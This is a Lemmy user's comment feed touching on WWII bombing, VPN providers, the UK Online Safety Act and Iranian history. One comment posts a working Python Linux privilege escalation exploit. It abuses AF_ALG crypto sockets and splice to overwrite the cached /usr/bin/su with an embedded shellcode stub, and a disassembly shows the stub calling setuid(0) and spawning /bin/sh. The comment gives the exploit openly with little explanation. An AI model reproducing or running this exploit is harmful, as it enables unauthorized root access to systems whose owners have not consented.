@pseud

pseud@lemmy.zip · 1 day ago

Classic rookie mistake.

The Nazis entered this war under the rather childish delusion that they were going to bomb everyone else, and nobody was going to bomb them. At Rotterdam, London, Warsaw, and half a hundred other places, they put their rather naive theory into operation. They sowed the wind, and now they are going to reap the whirlwind.

Sir Arthur “Bomber” Harris

pseud@lemmy.zip · 5 days ago

I use DragonFly BSD btw

pseud@lemmy.zip · edit-2 5 days ago

Script:

#!/usr/bin/env python3

import os, socket

f = os.open("/usr/bin/su", 0)

e = b'\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00>\x00\x01\x00\x00\x00x\x00@\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x008\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x001\xc01\xff\xb0i\x0f\x05H\x8d=\x0f\x00\x00\x001\xf6j;X\x99\x0f\x051\xffj<X\x0f\x05/bin/sh\x00\x00\x00'

for i in range(0, len(e), 4):
    s = socket.socket(38, 5, 0)
    s.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    s.setsockopt(279, 1, bytes.fromhex('0800010000000010' + '0' * 64))
    s.setsockopt(279, 5, None, 4)
    u, _ = s.accept()
    u.sendmsg([b"AAAA" + e[i:i + 4]],
              [(279, 3, b'\x00\x00\x00\x00'),
               (279, 2, b'\x10' + b'\x00' * 19),
               (279, 4, b'\x08\x00\x00\x00'), ],
              32768)
    r, w = os.pipe()
    os.splice(f, w, i + 4, offset_src=0)
    os.splice(r, u.fileno(), i + 4)
    try:
        u.recv(8 + i)
    except: pass

os.system("su")

Blob:

0x00400078      eax = 0
0x0040007a      edi = 0
0x0040007c      al = 0x69                 ; 'i' ; 105
0x0040007e      syscall                   ; sys_setuid(0)
0x00400080      rdi = rip + 0xf           ; data.00400096
                                          ; 0x400096 ; "/bin/sh"
0x00400087      esi = 0
0x00400089      push 0x3b                 ; ';' ; 59
0x0040008b      pop rax
0x0040008c      cdq
0x0040008d      syscall                   ; sys_execve("/bin/sh", NULL, NULL)
0x0040008f      edi = 0
0x00400091      push 0x3c                 ; '<' ; 60
0x00400093      pop rax
0x00400094      syscall                   ; sys_exit(0)

The blob is obviously a stub-su that /usr/bin/su page cache is poisoned with.

pseud@lemmy.zip · 2 months ago

That’s what being in a fucking pickle means.

I mean, I’d do the same…

pseud@lemmy.zip · 2 months ago

Namely,

Having a European version of the Play Integrity which permits people to use insecure products from specific European companies participating in it while disallowing using arbitrary hardware or software is the opposite of a solution. It’s more of the same anti-competitive garbage.

Hate to say it but he’s probably right.

pseud@lemmy.zip · 2 months ago

I have no idea if it’s better or how to make that call.

Njalla (wiki) has an excellent privacy-activist pedigree; the crew is more left than simply freeze peach; and they have a record of competence.

I think they deserve to be better known, and should be considered alongside Mullvad.

Edit:

Port forwarding :)

pseud@lemmy.zip · 2 months ago

Lemme just drop this here:

Njal.la

pseud@lemmy.zip · 2 months ago

Confused Windows Millennium Edition noises

pseud@lemmy.zip · 2 months ago

For what it’s worth, Libera IRC network published the legal advice that they got. According to that, Lemmy.zip is probably not in scope since it is just too small, thus doesn’t attract too many UK users inherently, and the UK is not a “target market”. They think that doing essentially nothing is a valid response in this case.

Of course, putting a block is also a valid response, and a louder one in some ways.

pseud@lemmy.zip · 2 months ago

Please Don’t Be a Lurker!

Made an acc recently because most other instances are too eager to defederate. Lovely place!

Question: since you are incorporated in Wales, what do you expect to do with the OSA (nevermind its extraterritoriality)? Wait for Ofcom to notice?

Another: why is Piefed using 4x less memory than Lemmy? Number of users?

pseud@lemmy.zip · 2 months ago

So… the consequences of the CIA’s actions?

That’s really fucking lazy. Also the consequences of British adventures in the century right up to that point, of Mongols torching everything to the ground, and oh Xerxes should have punished Dardanelles harder.

Like, yes it’s bad to rape people’s dignity, but come on, at least glance at Wikipedia sideways.

Khamenei was very involved in that.

You’ll shit bricks when you realise Khomeini and Khamenei are not the same Ayatollah :D

pseud@lemmy.zip · 2 months ago

You confused the Islamic Republic with the Mohammad Reza Pahlavi era.

CIA installed the son of the previous usurper. Theocracy was not installed - it was a revolution against that.